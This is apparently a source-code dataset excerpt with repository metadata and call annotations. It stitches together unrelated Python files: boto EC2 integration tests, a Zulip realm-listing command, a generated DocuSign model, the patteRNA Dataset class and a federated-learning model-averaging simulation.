[app_id.strip() for app_id in f.readlines()] return frozen_app_ids def get_frozen_app_ids(is_horizontal_banner=False): try: frozen_app_ids = load_frozen_app_ids() except FileNotFoundError: print("Creating {}".format(get_frozen_app_ids_filename())) frozen_app_ids = list_app_ids(is_horizontal_banner=is_horizontal_banner) freeze_app_ids(frozen_app_ids) return frozen_app_ids
[((8, 22, 8, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(8, 42, 8, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((16, 16, 16, 48), 'os.path.basename', 'os.path.basename', ({(16, 33, 16, 47): 'image_filename'}, {}), '(image_filename)', False, 'import os\n'), ((24, 22, 24, 63), 'data_utils.get_image_data_path', 'get_image_data_path', ({(24, 42, 24, 62): 'is_horizontal_banner'}, {}), '(is_horizontal_banner)', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((10, 53, 10, 74), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((18, 29, 18, 50), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((36, 30, 36, 45), 'data_utils.get_data_path', 'get_data_path', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n'), ((26, 22, 26, 43), 'pathlib.Path', 'Path', ({(26, 27, 26, 42): 'image_data_path'}, {}), '(image_data_path)', False, 'from pathlib import Path\n'), ((26, 55, 26, 76), 'data_utils.get_image_extension', 'get_image_extension', ({}, {}), '()', False, 'from data_utils import get_data_path, get_image_data_path, get_image_extension\n')]
sjm446/aMAZEd
upload.py
38789f9898097991b19e686fd76ef4abd5bfe94c
#!/usr/bin/env python import boto3 import random import os BUCKET=os.environ.get('EXPORT_S3_BUCKET_URL') if (BUCKET != None): s3 = boto3.client('s3') with open("maze.txt", "rb") as f: s3.upload_fileobj(f, BUCKET, "maze"+str(random.randrange(100000))+".txt") else: print("EXPORT_S3_BUCKET_URL was not set so not uploading file")
[((5, 7, 5, 45), 'os.environ.get', 'os.environ.get', ({(5, 22, 5, 44): '"""EXPORT_S3_BUCKET_URL"""'}, {}), "('EXPORT_S3_BUCKET_URL')", False, 'import os\n'), ((7, 9, 7, 27), 'boto3.client', 'boto3.client', ({(7, 22, 7, 26): '"""s3"""'}, {}), "('s3')", False, 'import boto3\n'), ((9, 48, 9, 72), 'random.randrange', 'random.randrange', ({(9, 65, 9, 71): '(100000)'}, {}), '(100000)', False, 'import random\n')]
rtzll/zulip
zerver/management/commands/list_realms.py
b831df8f7fc2f5b89ec998266901ac491d52a7fc
import sys from typing import Any from argparse import ArgumentParser from zerver.models import Realm from zerver.lib.management import ZulipBaseCommand class Command(ZulipBaseCommand): help = """List realms in the server and it's configuration settings(optional). Usage examples: ./manage.py list_realms ./manage.py list_realms --all""" def add_arguments(self, parser: ArgumentParser) -> None: parser.add_argument("--all", dest="all", action="store_true", default=False, help="Print all the configuration settings of the realms.") def handle(self, *args: Any, **options: Any) -> None: realms = Realm.objects.all() outer_format = "%-5s %-40s %-40s" inner_format = "%-40s %s" deactivated = False if not options["all"]: print(outer_format % ("id", "string_id", "name")) print(outer_format % ("--", "---------", "----")) for realm in realms: if realm.deactivated: print(self.style.ERROR(outer_format % (realm.id, realm.string_id, realm.name))) deactivated = True else: print(outer_format % (realm.id, realm.string_id, realm.name)) if deactivated: print(self.style.WARNING("\nRed rows represent deactivated realms.")) sys.exit(0) # The remaining code path is the --all case. identifier_attributes = ["id", "name", "string_id"] for realm in realms: # Start with just all the fields on the object, which is # hacky but doesn't require any work to maintain. realm_dict = realm.__dict__ # Remove a field that is confusingly useless del realm_dict['_state'] # Fix the one bitfield to display useful data realm_dict['authentication_methods'] = str(realm.authentication_methods_dict()) for key in identifier_attributes: if realm.deactivated: print(self.style.ERROR(inner_format % (key, realm_dict[key]))) deactivated = True else: print(inner_format % (key, realm_dict[key])) for key, value in sorted(realm_dict.iteritems()): if key not in identifier_attributes: if realm.deactivated: print(self.style.ERROR(inner_format % (key, value))) else: print(inner_format % (key, value)) print("-" * 80) if deactivated: print(self.style.WARNING("\nRed is used to highlight deactivated realms."))
[((26, 17, 26, 36), 'zerver.models.Realm.objects.all', 'Realm.objects.all', ({}, {}), '()', False, 'from zerver.models import Realm\n'), ((44, 12, 44, 23), 'sys.exit', 'sys.exit', ({(44, 21, 44, 22): '(0)'}, {}), '(0)', False, 'import sys\n')]
bopopescu/debpkg_python-boto
tests/integration/ec2/test_connection.py
06f9b6f3693ba1933be8214da69cebcd5212cd97
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2009, Eucalyptus Systems, Inc. # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. """ Some unit tests for the EC2Connection """ import unittest import time import telnetlib import socket from nose.plugins.attrib import attr from boto.ec2.connection import EC2Connection from boto.exception import EC2ResponseError class EC2ConnectionTest(unittest.TestCase): ec2 = True @attr('notdefault') def test_launch_permissions(self): # this is my user_id, if you want to run these tests you should # replace this with yours or they won't work user_id = '963068290131' print '--- running EC2Connection tests ---' c = EC2Connection() # get list of private AMI's rs = c.get_all_images(owners=[user_id]) assert len(rs) > 0 # now pick the first one image = rs[0] # temporarily make this image runnable by everyone status = image.set_launch_permissions(group_names=['all']) assert status d = image.get_launch_permissions() assert 'groups' in d assert len(d['groups']) > 0 # now remove that permission status = image.remove_launch_permissions(group_names=['all']) assert status time.sleep(10) d = image.get_launch_permissions() assert 'groups' not in d def test_1_basic(self): # create 2 new security groups c = EC2Connection() group1_name = 'test-%d' % int(time.time()) group_desc = 'This is a security group created during unit testing' group1 = c.create_security_group(group1_name, group_desc) time.sleep(2) group2_name = 'test-%d' % int(time.time()) group_desc = 'This is a security group created during unit testing' group2 = c.create_security_group(group2_name, group_desc) # now get a listing of all security groups and look for our new one rs = c.get_all_security_groups() found = False for g in rs: if g.name == group1_name: found = True assert found # now pass arg to filter results to only our new group rs = c.get_all_security_groups([group1_name]) assert len(rs) == 1 # try some group to group authorizations/revocations # first try the old style status = c.authorize_security_group(group1.name, group2.name, group2.owner_id) assert status status = c.revoke_security_group(group1.name, group2.name, group2.owner_id) assert status # now try specifying a specific port status = c.authorize_security_group(group1.name, group2.name, group2.owner_id, 'tcp', 22, 22) assert status status = c.revoke_security_group(group1.name, group2.name, group2.owner_id, 'tcp', 22, 22) assert status # now delete the second security group status = c.delete_security_group(group2_name) # now make sure it's really gone rs = c.get_all_security_groups() found = False for g in rs: if g.name == group2_name: found = True assert not found group = group1 # now try to launch apache image with our new security group rs = c.get_all_images() img_loc = 'ec2-public-images/fedora-core4-apache.manifest.xml' for image in rs: if image.location == img_loc: break reservation = image.run(security_groups=[group.name]) instance = reservation.instances[0] while instance.state != 'running': print '\tinstance is %s' % instance.state time.sleep(30) instance.update() # instance in now running, try to telnet to port 80 t = telnetlib.Telnet() try: t.open(instance.dns_name, 80) except socket.error: pass # now open up port 80 and try again, it should work group.authorize('tcp', 80, 80, '0.0.0.0/0') t.open(instance.dns_name, 80) t.close() # now revoke authorization and try again group.revoke('tcp', 80, 80, '0.0.0.0/0') try: t.open(instance.dns_name, 80) except socket.error: pass # now kill the instance and delete the security group instance.terminate() # check that state and previous_state have updated assert instance.state == 'shutting-down' assert instance.state_code == 32 assert instance.previous_state == 'running' assert instance.previous_state_code == 16 # unfortunately, I can't delete the sg within this script #sg.delete() # create a new key pair key_name = 'test-%d' % int(time.time()) status = c.create_key_pair(key_name) assert status # now get a listing of all key pairs and look for our new one rs = c.get_all_key_pairs() found = False for k in rs: if k.name == key_name: found = True assert found # now pass arg to filter results to only our new key pair rs = c.get_all_key_pairs([key_name]) assert len(rs) == 1 key_pair = rs[0] # now delete the key pair status = c.delete_key_pair(key_name) # now make sure it's really gone rs = c.get_all_key_pairs() found = False for k in rs: if k.name == key_name: found = True assert not found # short test around Paid AMI capability demo_paid_ami_id = 'ami-bd9d78d4' demo_paid_ami_product_code = 'A79EC0DB' l = c.get_all_images([demo_paid_ami_id]) assert len(l) == 1 assert len(l[0].product_codes) == 1 assert l[0].product_codes[0] == demo_paid_ami_product_code print '--- tests completed ---' def test_dry_run(self): c = EC2Connection() dry_run_msg = 'Request would have succeeded, but DryRun flag is set.' try: rs = c.get_all_images(dry_run=True) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) try: rs = c.run_instances( image_id='ami-a0cd60c9', instance_type='m1.small', dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) # Need an actual instance for the rest of this... rs = c.run_instances( image_id='ami-a0cd60c9', instance_type='m1.small' ) time.sleep(120) try: rs = c.stop_instances( instance_ids=[rs.instances[0].id], dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) try: rs = c.terminate_instances( instance_ids=[rs.instances[0].id], dry_run=True ) self.fail("Should have gotten an exception") except EC2ResponseError, e: self.assertTrue(dry_run_msg in str(e)) # And kill it. rs.instances[0].terminate()
[]
joekohlsdorf/docusign-esign-python-client
docusign_esign/models/conditional_recipient_rule_filter.py
40407544f79c88716d36fabf36f65c3ef1a5c3ba
# coding: utf-8 """ DocuSign REST API The DocuSign REST API provides you with a powerful, convenient, and simple Web services API for interacting with DocuSign. # noqa: E501 OpenAPI spec version: v2.1 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from docusign_esign.client.configuration import Configuration class ConditionalRecipientRuleFilter(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'operator': 'str', 'recipient_id': 'str', 'scope': 'str', 'tab_id': 'str', 'tab_label': 'str', 'tab_type': 'str', 'value': 'str' } attribute_map = { 'operator': 'operator', 'recipient_id': 'recipientId', 'scope': 'scope', 'tab_id': 'tabId', 'tab_label': 'tabLabel', 'tab_type': 'tabType', 'value': 'value' } def __init__(self, _configuration=None, **kwargs): # noqa: E501 """ConditionalRecipientRuleFilter - a model defined in Swagger""" # noqa: E501 if _configuration is None: _configuration = Configuration() self._configuration = _configuration self._operator = None self._recipient_id = None self._scope = None self._tab_id = None self._tab_label = None self._tab_type = None self._value = None self.discriminator = None setattr(self, "_{}".format('operator'), kwargs.get('operator', None)) setattr(self, "_{}".format('recipient_id'), kwargs.get('recipient_id', None)) setattr(self, "_{}".format('scope'), kwargs.get('scope', None)) setattr(self, "_{}".format('tab_id'), kwargs.get('tab_id', None)) setattr(self, "_{}".format('tab_label'), kwargs.get('tab_label', None)) setattr(self, "_{}".format('tab_type'), kwargs.get('tab_type', None)) setattr(self, "_{}".format('value'), kwargs.get('value', None)) @property def operator(self): """Gets the operator of this ConditionalRecipientRuleFilter. # noqa: E501 # noqa: E501 :return: The operator of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._operator @operator.setter def operator(self, operator): """Sets the operator of this ConditionalRecipientRuleFilter. # noqa: E501 :param operator: The operator of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._operator = operator @property def recipient_id(self): """Gets the recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501 Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501 :return: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._recipient_id @recipient_id.setter def recipient_id(self, recipient_id): """Sets the recipient_id of this ConditionalRecipientRuleFilter. Unique for the recipient. It is used by the tab element to indicate which recipient is to sign the Document. # noqa: E501 :param recipient_id: The recipient_id of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._recipient_id = recipient_id @property def scope(self): """Gets the scope of this ConditionalRecipientRuleFilter. # noqa: E501 # noqa: E501 :return: The scope of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._scope @scope.setter def scope(self, scope): """Sets the scope of this ConditionalRecipientRuleFilter. # noqa: E501 :param scope: The scope of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._scope = scope @property def tab_id(self): """Gets the tab_id of this ConditionalRecipientRuleFilter. # noqa: E501 The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501 :return: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._tab_id @tab_id.setter def tab_id(self, tab_id): """Sets the tab_id of this ConditionalRecipientRuleFilter. The unique identifier for the tab. The tabid can be retrieved with the [ML:GET call]. # noqa: E501 :param tab_id: The tab_id of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._tab_id = tab_id @property def tab_label(self): """Gets the tab_label of this ConditionalRecipientRuleFilter. # noqa: E501 The label string associated with the tab. # noqa: E501 :return: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._tab_label @tab_label.setter def tab_label(self, tab_label): """Sets the tab_label of this ConditionalRecipientRuleFilter. The label string associated with the tab. # noqa: E501 :param tab_label: The tab_label of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._tab_label = tab_label @property def tab_type(self): """Gets the tab_type of this ConditionalRecipientRuleFilter. # noqa: E501 # noqa: E501 :return: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._tab_type @tab_type.setter def tab_type(self, tab_type): """Sets the tab_type of this ConditionalRecipientRuleFilter. # noqa: E501 :param tab_type: The tab_type of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._tab_type = tab_type @property def value(self): """Gets the value of this ConditionalRecipientRuleFilter. # noqa: E501 Specifies the value of the tab. # noqa: E501 :return: The value of this ConditionalRecipientRuleFilter. # noqa: E501 :rtype: str """ return self._value @value.setter def value(self, value): """Sets the value of this ConditionalRecipientRuleFilter. Specifies the value of the tab. # noqa: E501 :param value: The value of this ConditionalRecipientRuleFilter. # noqa: E501 :type: str """ self._value = value def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(ConditionalRecipientRuleFilter, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, ConditionalRecipientRuleFilter): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, ConditionalRecipientRuleFilter): return True return self.to_dict() != other.to_dict()
[((243, 23, 243, 56), 'six.iteritems', 'six.iteritems', ({(243, 37, 243, 55): 'self.swagger_types'}, {}), '(self.swagger_types)', False, 'import six\n'), ((58, 29, 58, 44), 'docusign_esign.client.configuration.Configuration', 'Configuration', ({}, {}), '()', False, 'from docusign_esign.client.configuration import Configuration\n')]
meshy/django-conman
conman/routes/apps.py
c739d09250d02d99068358e925ed8298a2a37a75
from django.apps import AppConfig from django.core.checks import register from . import checks class RouteConfig(AppConfig): """The AppConfig for conman routes.""" name = 'conman.routes' def ready(self): """Register checks for conman routes.""" register(checks.polymorphic_installed) register(checks.subclasses_available) register(checks.subclasses_in_admin)
[((13, 8, 13, 46), 'django.core.checks.register', 'register', ({(13, 17, 13, 45): 'checks.polymorphic_installed'}, {}), '(checks.polymorphic_installed)', False, 'from django.core.checks import register\n'), ((14, 8, 14, 45), 'django.core.checks.register', 'register', ({(14, 17, 14, 44): 'checks.subclasses_available'}, {}), '(checks.subclasses_available)', False, 'from django.core.checks import register\n'), ((15, 8, 15, 44), 'django.core.checks.register', 'register', ({(15, 17, 15, 43): 'checks.subclasses_in_admin'}, {}), '(checks.subclasses_in_admin)', False, 'from django.core.checks import register\n')]
DJHig/TM1py-samples
Other/transactionlog entries since timestamp.py
da4050380447472a02e2a107a2c5be79ac284d0a
""" Get all TM1 transactions for all cubes starting to a specific date. """ import configparser config = configparser.ConfigParser() config.read('..\config.ini') from datetime import datetime from TM1py.Services import TM1Service with TM1Service(**config['tm1srv01']) as tm1: # Timestamp for Message-Log parsing timestamp = datetime(year=2018, month=2, day=15, hour=16, minute=2, second=0) # Get all entries since timestamp entries = tm1.server.get_transaction_log_entries(since=timestamp) # loop through entries for entry in entries: # Do stuff print(entry['TimeStamp'], entry)
[((6, 9, 6, 36), 'configparser.ConfigParser', 'configparser.ConfigParser', ({}, {}), '()', False, 'import configparser\n'), ((14, 5, 14, 37), 'TM1py.Services.TM1Service', 'TM1Service', ({}, {}), "(**config['tm1srv01'])", False, 'from TM1py.Services import TM1Service\n'), ((17, 16, 17, 81), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import datetime\n')]
AviranLab/patteRNA
src/patteRNA/Dataset.py
88b900844016717a71b6ec8e4f2d10d8888600ce
import logging import numpy as np from scipy.stats import entropy from patteRNA.Transcript import Transcript from patteRNA import filelib logger = logging.getLogger(__name__) class Dataset: def __init__(self, fp_observations, fp_sequences=None, fp_references=None): self.fp_obs = fp_observations self.fp_fasta = fp_sequences self.fp_refs = fp_references self.rnas = dict() self.stats = dict() def load_rnas(self, log_flag=False): observations_dict = filelib.parse_observations(self.fp_obs) observations_rnas = set(observations_dict.keys()) dataset_rnas = observations_rnas sequences_dict = None if self.fp_fasta: sequences_dict = filelib.parse_fasta(self.fp_fasta) sequences_rnas = set(sequences_dict.keys()) # Cross reference input files to confirm all transcripts for rna in observations_rnas.difference(sequences_rnas): print('WARNING - No sequence found for RNA: {}'.format(rna)) sequences_dict[rna] = ''.join(['N'] * len(observations_dict[rna])) for rna in sequences_rnas.difference(observations_rnas): print('WARNING - No probing data found for RNA: {}'.format(rna)) observations_dict[rna] = np.tile(np.nan, len(sequences_dict[rna])) dataset_rnas.update(sequences_rnas) for rna_name in dataset_rnas: if self.fp_fasta: self.rnas[rna_name] = Transcript(rna_name, sequences_dict[rna_name], observations_dict[rna_name]) else: self.rnas[rna_name] = Transcript(rna_name, 'N' * len(observations_dict[rna_name]), observations_dict[rna_name]) if log_flag: for rna in self.rnas: self.rnas[rna].log_transform() self.compute_stats() def compute_stats(self): """ Parse all finite observations in the input file and compute some statistics on the data. These statistics are mostly used to initialize parameters of the emission model before training. """ finite_obs = [] total_obs = 0 up_ref = 0 p_ref = 0 for rna in self.rnas: finite_obs.extend(self.rnas[rna].obs[np.isfinite(self.rnas[rna].obs)]) total_obs += len(self.rnas[rna].obs) up_ref += int(np.sum(self.rnas[rna].ref == 0)) p_ref += int(np.sum(self.rnas[rna].ref == 1)) self.stats['quantile_basis'] = np.linspace(0, 1, 1000) self.stats['quantiles'] = np.quantile(finite_obs, self.stats["quantile_basis"]) self.stats['P25'], self.stats['P75'] = np.percentile(finite_obs, (25, 75)) self.stats['P40'], self.stats['P60'] = np.percentile(finite_obs, (40, 60)) self.stats['n_obs'] = len(finite_obs) self.stats['up_ref'] = up_ref self.stats['p_ref'] = p_ref self.stats['total_obs'] = total_obs self.stats['continuous_variance'] = np.var(finite_obs) self.stats['minimum'] = np.min(finite_obs) self.stats['maximum'] = np.max(finite_obs) self.stats['finite_obs'] = finite_obs self.stats['histogram_bins'] = np.linspace(self.stats['minimum'], self.stats['maximum'], 20) self.stats['histogram'], _ = np.histogram(finite_obs, bins=self.stats['histogram_bins'], density=True) def spawn_training_set(self, kl_div): """ Spawn a training set (smaller than or equal size to overall data) based on KL divergence criteria. Transcripts are incrementally added to a training Dataset (high quality transcripts first) until the training set's KL divergence from the overall data falls below the provided threshold. """ training_transcripts = [] training_obs = [] kl_div_set = 1.0 group_size = 20 logger.info(' ... sorting') rnas_sd = sorted(self.rnas.values(), key=lambda transcript: transcript.density, reverse=True) logger.info(' ... selecting') while kl_div_set > kl_div and rnas_sd: rnas = rnas_sd[:group_size] rnas_sd[:group_size] = [] for rna in rnas: training_transcripts.append(rna.name) training_obs.extend(rna.obs[rna.mask_finite]) training_histogram, _ = np.histogram(training_obs, bins=self.stats['histogram_bins'], density=True) kl_div_set = entropy(training_histogram, self.stats['histogram']) training_set = self.spawn_set(rnas=training_transcripts) training_set.compute_stats() return training_set, kl_div_set def pre_process(self, model, scoring=False): if model.emission_model.type == 'DOM': for rna in self.rnas: model.emission_model.discretize(self.rnas[rna]) if scoring: for rna in self.rnas.values(): model.e_step(rna) rna.compute_log_B_ratios() def get_emissions(self, model): for rna in self.rnas: model.emission_model.compute_emissions(self.rnas[rna]) def spawn_set(self, rnas): spawned_set = Dataset(fp_observations=None, fp_sequences=None, fp_references=None) spawned_set.rnas = {rna: self.rnas[rna] for rna in rnas} return spawned_set def spawn_reference_set(self): spawned_set = Dataset(fp_observations=None, fp_references=None, fp_sequences=None) references = [rna for rna in self.rnas if self.rnas[rna].ref is not None] spawned_set.rnas = {rna: self.rnas[rna] for rna in references} spawned_set.compute_stats() return spawned_set def clear(self): self.rnas = None self.stats = None
[((7, 9, 7, 36), 'logging.getLogger', 'logging.getLogger', ({(7, 27, 7, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((20, 28, 20, 67), 'patteRNA.filelib.parse_observations', 'filelib.parse_observations', ({(20, 55, 20, 66): 'self.fp_obs'}, {}), '(self.fp_obs)', False, 'from patteRNA import filelib\n'), ((72, 39, 72, 62), 'numpy.linspace', 'np.linspace', ({(72, 51, 72, 52): '0', (72, 54, 72, 55): '1', (72, 57, 72, 61): '1000'}, {}), '(0, 1, 1000)', True, 'import numpy as np\n'), ((73, 34, 73, 87), 'numpy.quantile', 'np.quantile', ({(73, 46, 73, 56): 'finite_obs', (73, 58, 73, 86): "self.stats['quantile_basis']"}, {}), "(finite_obs, self.stats['quantile_basis'])", True, 'import numpy as np\n'), ((74, 47, 74, 82), 'numpy.percentile', 'np.percentile', ({(74, 61, 74, 71): 'finite_obs', (74, 73, 74, 81): '(25, 75)'}, {}), '(finite_obs, (25, 75))', True, 'import numpy as np\n'), ((75, 47, 75, 82), 'numpy.percentile', 'np.percentile', ({(75, 61, 75, 71): 'finite_obs', (75, 73, 75, 81): '(40, 60)'}, {}), '(finite_obs, (40, 60))', True, 'import numpy as np\n'), ((80, 44, 80, 62), 'numpy.var', 'np.var', ({(80, 51, 80, 61): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((81, 32, 81, 50), 'numpy.min', 'np.min', ({(81, 39, 81, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((82, 32, 82, 50), 'numpy.max', 'np.max', ({(82, 39, 82, 49): 'finite_obs'}, {}), '(finite_obs)', True, 'import numpy as np\n'), ((84, 39, 84, 100), 'numpy.linspace', 'np.linspace', ({(84, 51, 84, 72): "self.stats['minimum']", (84, 74, 84, 95): "self.stats['maximum']", (84, 97, 84, 99): '20'}, {}), "(self.stats['minimum'], self.stats['maximum'], 20)", True, 'import numpy as np\n'), ((85, 37, 87, 63), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((27, 29, 27, 63), 'patteRNA.filelib.parse_fasta', 'filelib.parse_fasta', ({(27, 49, 27, 62): 'self.fp_fasta'}, {}), '(self.fp_fasta)', False, 'from patteRNA import filelib\n'), ((113, 36, 115, 62), 'numpy.histogram', 'np.histogram', (), '', True, 'import numpy as np\n'), ((116, 25, 116, 77), 'scipy.stats.entropy', 'entropy', ({(116, 33, 116, 51): 'training_histogram', (116, 53, 116, 76): "self.stats['histogram']"}, {}), "(training_histogram, self.stats['histogram'])", False, 'from scipy.stats import entropy\n'), ((43, 38, 43, 113), 'patteRNA.Transcript.Transcript', 'Transcript', ({(43, 49, 43, 57): 'rna_name', (43, 59, 43, 83): 'sequences_dict[rna_name]', (43, 85, 43, 112): 'observations_dict[rna_name]'}, {}), '(rna_name, sequences_dict[rna_name], observations_dict[rna_name])', False, 'from patteRNA.Transcript import Transcript\n'), ((69, 26, 69, 57), 'numpy.sum', 'np.sum', ({(69, 33, 69, 56): '(self.rnas[rna].ref == 0)'}, {}), '(self.rnas[rna].ref == 0)', True, 'import numpy as np\n'), ((70, 25, 70, 56), 'numpy.sum', 'np.sum', ({(70, 32, 70, 55): '(self.rnas[rna].ref == 1)'}, {}), '(self.rnas[rna].ref == 1)', True, 'import numpy as np\n'), ((67, 49, 67, 80), 'numpy.isfinite', 'np.isfinite', ({(67, 61, 67, 79): 'self.rnas[rna].obs'}, {}), '(self.rnas[rna].obs)', True, 'import numpy as np\n')]
GYRY-NEU/CS7610-Experiments
src/Simulation/developer_0/main.py
3731b45c4a9cba2a1d7e44d37f28d1046a38de47
import library import json @library.export def init(args): model = [[9.2, 0.21, 0.21], [8.2, 0.22, 0.21], [7.2, 1.21, 2.41], [1.2, 2.21, 0.29]] library.put("model", model) ROUND = 0 library.put("ROUND", ROUND) alpha = 0.2 library.put("alpha", alpha) @library.export def clientUpload(args): # get client model client = json.loads(args["data"]) # client round k = "round" + str(client["round"]) # save model to buckets library.put_bucket(k, client["model"]) # if enough models if library.count_bucket(k) > 20: ROUND = library.get("ROUND") # check client rounds == current rounds if ROUND != client["round"]: return False # set round to -1 to prevent clients uploading to this bucket library.put("ROUND", -1) model = library.get("model") list_weights = library.get_bucket(k) model = updateModel(model, list_weights) # save calculated model and restore round library.put("model", model) library.put("ROUND", ROUND+1) return True def updateModel(model, list_weights): """ list_weights : 3D list of shape : (clientNumber,modelOuter, modelInner) It contains all the models for each client """ # this part will change developer to developer # one can just take avg # or one can discard smallest and largest than take average # this example just takes avg without use of external library alpha = library.get("alpha") # getting shape of 3D array number_clients = len(list_weights) size_outer = len(list_weights[0]) size_inner = len(list_weights[0][0]) # constructing a new 2D array of zeros of same size newModel = [ [0 for j in range(size_inner)] for i in range(size_outer)] # validate new created shape assert(len(newModel) == size_outer) assert(len(newModel[0]) == size_inner) # sum for all the clients for weights in list_weights: for outerIndex, outerList in enumerate(weights): for innerIndex, innerVal in enumerate(outerList): newModel[outerIndex][innerIndex] += innerVal # average it by number of clients for outerIndex, outerList in enumerate(newModel): for innerIndex, innerVal in enumerate(outerList): newModel[outerIndex][innerIndex] /= number_clients # now update the model using the learning rate using below formula # model = (1-a) * model + a * new_model # Prev. part and next part could be merged for efficiency but readability they implemented with two loops # Iterate over model for outerIndex, outerList in enumerate(newModel): for innerIndex, innerVal in enumerate(outerList): model[outerIndex][innerIndex] *= 1-alpha model[outerIndex][innerIndex] += alpha * newModel[outerIndex][innerIndex] # Finally update round number return model @library.export def getModel(args): return library.get("model") @library.export def getRound(args): return library.get("ROUND")
[((10, 4, 10, 31), 'library.put', 'library.put', ({(10, 16, 10, 23): '"""model"""', (10, 25, 10, 30): 'model'}, {}), "('model', model)", False, 'import library\n'), ((12, 4, 12, 31), 'library.put', 'library.put', ({(12, 16, 12, 23): '"""ROUND"""', (12, 25, 12, 30): 'ROUND'}, {}), "('ROUND', ROUND)", False, 'import library\n'), ((14, 4, 14, 31), 'library.put', 'library.put', ({(14, 16, 14, 23): '"""alpha"""', (14, 25, 14, 30): 'alpha'}, {}), "('alpha', alpha)", False, 'import library\n'), ((19, 13, 19, 37), 'json.loads', 'json.loads', ({(19, 24, 19, 36): "args['data']"}, {}), "(args['data'])", False, 'import json\n'), ((25, 4, 25, 42), 'library.put_bucket', 'library.put_bucket', ({(25, 23, 25, 24): 'k', (25, 26, 25, 41): "client['model']"}, {}), "(k, client['model'])", False, 'import library\n'), ((59, 12, 59, 32), 'library.get', 'library.get', ({(59, 24, 59, 31): '"""alpha"""'}, {}), "('alpha')", False, 'import library\n'), ((100, 11, 100, 31), 'library.get', 'library.get', ({(100, 23, 100, 30): '"""model"""'}, {}), "('model')", False, 'import library\n'), ((104, 11, 104, 31), 'library.get', 'library.get', ({(104, 23, 104, 30): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((28, 7, 28, 30), 'library.count_bucket', 'library.count_bucket', ({(28, 28, 28, 29): 'k'}, {}), '(k)', False, 'import library\n'), ((29, 16, 29, 36), 'library.get', 'library.get', ({(29, 28, 29, 35): '"""ROUND"""'}, {}), "('ROUND')", False, 'import library\n'), ((36, 8, 36, 32), 'library.put', 'library.put', ({(36, 20, 36, 27): '"""ROUND"""', (36, 29, 36, 31): '(-1)'}, {}), "('ROUND', -1)", False, 'import library\n'), ((38, 16, 38, 36), 'library.get', 'library.get', ({(38, 28, 38, 35): '"""model"""'}, {}), "('model')", False, 'import library\n'), 